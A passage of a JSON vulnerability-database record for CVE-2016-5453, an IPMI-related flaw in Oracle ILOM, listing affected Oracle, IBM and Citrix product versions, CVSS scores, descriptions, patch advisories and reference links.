"model": "database 12c release",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "112.12"
},
{
"model": "database 12c release",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "112.11"
},
{
"model": "database 11g release",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "211.2.0.4"
},
{
"model": "communications unified session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3.5"
},
{
"model": "communications unified session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2.5"
},
{
"model": "communications session border controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3.0"
},
{
"model": "communications session border controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2.0"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.9"
},
{
"model": "communications operations monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.2.0.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.1.0.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.0.2.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.0.1.0"
},
{
"model": "communications network charging and control",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.4.1.5.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.530.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.529.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.5.33.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.5"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"model": "communications messaging server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3"
},
{
"model": "communications eagle application processor",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.0"
},
{
"model": "communications core session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3.5"
},
{
"model": "communications core session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2.5"
},
{
"model": "communications asap",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.3"
},
{
"model": "communications asap",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2"
},
{
"model": "communications asap",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"model": "business intelligence enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.2.1.0.0"
},
{
"model": "business intelligence enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"model": "business intelligence enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7.0"
},
{
"model": "bi publisher",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0.0"
},
{
"model": "bi publisher",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"model": "bi publisher",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7.0"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.5.0"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.4.1"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.4.0"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.3.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.3"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.6"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2.1.00.10"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.2.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.1.3"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.1.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.1.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.3.00.08"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2.0.00.27"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.5"
},
{
"model": "agile plm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.3.5"
},
{
"model": "agile plm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.3.4"
},
{
"model": "agile engineering data management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"model": "agile engineering data management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.1.3.0"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.43"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.4.2"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.4"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.2.0.0"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "websphere application server liberty pr",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.0-"
},
{
"model": "websphere application server full profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"model": "websphere application server liberty profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "websphere application server full profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.8"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.7"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "11.1"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.5"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1"
},
{
"model": "netscaler t1",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "netscaler service delivery appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "netscaler gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "netscaler application delivery controller",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "command center appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "cloudbridge",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92014"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003879"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-817"
},
{
"db": "NVD",
"id": "CVE-2016-5453"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:oracle:integrated_lights_out_manager_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003879"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oracle",
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92014"
}
],
"trust": 0.6
},
"cve": "CVE-2016-5453",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2016-5453",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-94272",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2016-5453",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-5453",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2016-5453",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201607-817",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-94272",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-5453",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-94272"
},
{
"db": "VULMON",
"id": "CVE-2016-5453"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003879"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-817"
},
{
"db": "NVD",
"id": "CVE-2016-5453"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to IPMI. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the \u0027IPMI\u0027 protocol. The \u0027IPMI\u0027 sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-5453"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003879"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92014"
},
{
"db": "VULHUB",
"id": "VHN-94272"
},
{
"db": "VULMON",
"id": "CVE-2016-5453"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-5453",
"trust": 2.9
},
{
"db": "BID",
"id": "91787",
"trust": 1.5
},
{
"db": "BID",
"id": "92014",
"trust": 1.5
},
{
"db": "SECTRACK",
"id": "1036408",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003879",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201607-817",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-94272",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-5453",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-94272"
},
{
"db": "VULMON",
"id": "CVE-2016-5453"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92014"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003879"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-817"
},
{
"db": "NVD",
"id": "CVE-2016-5453"
}
]
},
"id": "VAR-201607-0661",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-94272"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T22:06:19.002000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Oracle Critical Patch Update Advisory - July 2016",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html"
},
{
"title": "July 2016 Critical Patch Update Released",
"trust": 0.8,
"url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update"
},
{
"title": "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63177"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-5453"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003879"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-817"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-5453"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"trust": 1.3,
"url": "http://www.securityfocus.com/bid/92014"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/91787"
},
{
"trust": 1.2,
"url": "http://www.securitytracker.com/id/1036408"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5453"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5453"
},
{
"trust": 0.3,
"url": "http://www.oracle.com"
},
{
"trust": 0.3,
"url": "http://support.citrix.com/article/ctx216642"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984819"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988710"
},
{
"trust": 0.3,
"url": "http://www.oracle.com/index.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=47152"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-94272"
},
{
"db": "VULMON",
"id": "CVE-2016-5453"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92014"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003879"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-817"
},
{
"db": "NVD",
"id": "CVE-2016-5453"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-94272"
},
{
"db": "VULMON",
"id": "CVE-2016-5453"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92014"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003879"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-817"
},
{
"db": "NVD",
"id": "CVE-2016-5453"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-07-21T00:00:00",
"db": "VULHUB",
"id": "VHN-94272"
},
{
"date": "2016-07-21T00:00:00",
"db": "VULMON",
"id": "CVE-2016-5453"
},
{
"date": "2016-07-15T00:00:00",
"db": "BID",
"id": "91787"
},
{
"date": "2016-07-19T00:00:00",
"db": "BID",
"id": "92014"
},
{
"date": "2016-07-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003879"
},
{
"date": "2016-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201607-817"
},
{
"date": "2016-07-21T10:15:09.397000",
"db": "NVD",
"id": "CVE-2016-5453"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-01T00:00:00",
"db": "VULHUB",
"id": "VHN-94272"
},
{
"date": "2017-09-01T00:00:00",
"db": "VULMON",
"id": "CVE-2016-5453"
},
{
"date": "2018-10-15T09:00:00",
"db": "BID",
"id": "91787"
},
{
"date": "2016-07-19T00:00:00",
"db": "BID",
"id": "92014"
},
{
"date": "2016-07-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003879"
},
{
"date": "2016-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201607-817"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-5453"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92014"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oracle Sun Systems Products Suite of ILOM In IPMI Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003879"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92014"
}
],
"trust": 0.6
}
}